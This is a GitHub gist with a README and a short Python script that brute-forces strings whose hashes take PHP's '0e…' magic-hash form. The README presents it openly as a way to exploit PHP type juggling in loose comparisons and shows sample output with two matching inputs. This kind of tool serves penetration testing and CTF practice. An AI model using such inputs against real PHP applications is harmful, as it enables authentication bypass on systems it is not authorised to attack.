Skip to content

Instantly share code, notes, and snippets.

@dhondta

dhondta/README.md

Last active July 31, 2023 22:14
Show Gist options
  • Save dhondta/8937374f087f708c608bcacac431969f to your computer and use it in GitHub Desktop.
Save dhondta/8937374f087f708c608bcacac431969f to your computer and use it in GitHub Desktop.
Download ZIP
Tinyscript tool for generating loose comparison hashes for PHP type juggling
Raw
README.md

PHP loose comparison input generator

This Tinyscript-based allows to generate a string with a given alphabet that has a given hash matching the format used for type juggling with PHP, that is when a loose comparison of the type ("0e12345" == ...) is used.

This can be installed using:

$ pip install tinyscript
$ tsm install loose-comparison-input-generator

This tool is especially useful in the use cases hereafter.

Generate hashes for exploiting a PHP type juggling vulnerability

$ python3 loose-comparison-input-generator.py --timings -a 0123456789abcdefABCDEF
22:08:25 [WARNING] 0e283693623042943587666692738042: 1Cbca4D
22:08:25 [TIME] > Time elapsed since execution start: 976.6611046791077 seconds
22:22:14 [WARNING] 0e743365132016763607448823802679: 462beA7
22:22:14 [TIME] > Time elapsed since execution start: 1805.5506649017334 seconds
Raw
loose-comparison-input-generator.py
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from tinyscript import *
__author__ = "Alexandre D'Hondt"
__version__ = "1.1"
__copyright__ = "A. D'Hondt"
__license__ = "agpl-3.0"
__doc__ = """
This tool simply generates a string with a given alphabet that has a given hash
matching the format used for type juggling with PHP, that is when a loose
comparison of the type ("0e12345" == ...) is used.
"""
__examples__ = ["-v", "-a 0123456789abcdefABCDEF", "--hash sha1", "--timings"]
if __name__ == '__main__':
parser.add_argument("-a", dest="alphabet", default=string.digits+string.ascii_letters, help="alphabet to be used")
parser.add_argument("--hash", default="md5", help="hash algorithm to be used")
initialize(add_time=True)
validate(('hash', "not hasattr(hashlib, ? )", "Bad hash algorithm"))
for s in ts.bruteforce(2**32, args.alphabet):
h = getattr(hashlib, args.hash)(b(s)).hexdigest()
logger.debug("{}: {}".format(h, s))
if re.match(r"^0+e\d+$", h):
logger.warn("{}: {}".format(h, s))
get_time()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment